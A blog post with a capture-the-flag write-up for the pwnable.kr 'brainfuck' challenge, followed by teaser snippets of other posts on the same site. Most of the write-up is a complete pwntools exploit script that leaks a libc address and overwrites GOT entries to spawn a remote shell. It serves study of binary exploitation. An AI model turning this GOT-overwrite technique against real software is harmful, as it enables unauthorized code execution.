ctf

Pwnable.kr - brainfuck

Miracle Yu

08 May 2017 — 1 min read

Challenge

I made a simple brain-fuck language emulation program written in C. 
The [ ] commands are not implemented yet. However the rest functionality seems working fine. 
Find a bug and exploit it to get a shell. 

Download : http://pwnable.kr/bin/bf
Download : http://pwnable.kr/bin/bf_libc.so

Running at : nc pwnable.kr 9001

Analyze

Brain**** is a ****ing lovely programming language like Whitespace, with only 8 operations: "<>-+.,[]", it's very interesting though.
The point is to overwrite values in got.plt
You need to find a way to execute system with parameter(s) to get the shell.

Solution

from pwn import *

DEBUG=0
if DEBUG == 1:
  p=process('./bf')
  libc = ELF('./bf_libc.so')
else:
  p=remote('pwnable.kr', 9001)
  libc = ELF('./bf_libc.so')

a_tape=0x0804a0a0
a_main=0x08048671
a_gotplt_fgets=0x0804a010
a_gotplt_memset=0x0804a02c
a_gotplt_putchar=0x0804a030

global cp
cp = a_tape # current position

def mp(f, t): # move position (change p's value) payload
  global cp
  cp = cp + (t - f)
  if t>f:
    return '>'*(t-f)
  else:
    return '<'*(f-t)

write=',>'*4 + '<'*4
leakandwrite='.>'*4 + '<'*4 + ',>'*4 + '<'*4

payload = mp(cp, a_gotplt_fgets)
payload += leakandwrite
payload += mp(cp, a_gotplt_memset)
payload += write
payload += mp(cp, a_gotplt_putchar)
payload += write
payload += '.'

print p.recvline_startswith('type')
p.sendline(payload)

a_fgets=int(p.recvn(4)[::-1].encode('hex'),16)
a_gets=a_fgets+(libc.symbols['gets'] - libc.symbols['fgets'])
a_system=a_fgets+(libc.symbols['system'] - libc.symbols['fgets'])

p.send(p32(a_system))
p.send(p32(a_gets))
p.send(p32(a_main))
p.sendline('/bin/sh')

p.interactive()

Notice: when send addresses in the very last lines, you need to use send() rather than sendline()
Also Notice: you can of course read the 'actual' addresses inside got.plt from the binary you downloaded, but don't use those values, because they will change when the program starts to run. Instead, you should leak their values dynamicly with '.' operation.

References

Pwnable.kr – Rookiss Write-Up

[systemoverlord.com] GOT and PLT for pwning.

[Airs – Ian Lance Taylor] famous blog series about linker and loader

[stackoverflow] python [ : : -1]

Shadowsocks Windows Setup

1. Download the client from here, or use the following Shadowsocks-4.4.1.0Shadowsocks-4.4.1.0.zip4 MBdownload-circle 2. Download OBFS plugin here, or use the following obfs-localobfs-local.zip170 KBdownload-circle 3. unzip the obfs-local.zip, put both files in the same directory with shadowsocks.exe 4. right-click shadowsocks taskbar

Hello Again

This is M1r4c13, a brand-new site by Miracle Yu that reborn from the previous xhyumiracle website, after offline for 7 years. Many things changed, my focus also changes from security to crypto * (zk + ai). Hope I can bring you some more interesting facts in this new world. Things will be

EOS Source Code Review - 0x00

Before Start I wrote this series of posts to remind myself the way I analysis EOS src code. My purpose was to learn security handling in C++. I'll update posts as I analyzing it, so maybe it lacks of construction, forgive me on this if it does. nodeos

EOS Dev Guide 0x03

pre-requisite This part assumes you've created at least one account. If not, please check the previous post EOS Dev Guide 0x02. Compile contract contract needs to be first compiled to .wasm format as a bin file. Then generate the .abi file to serve as a function interface index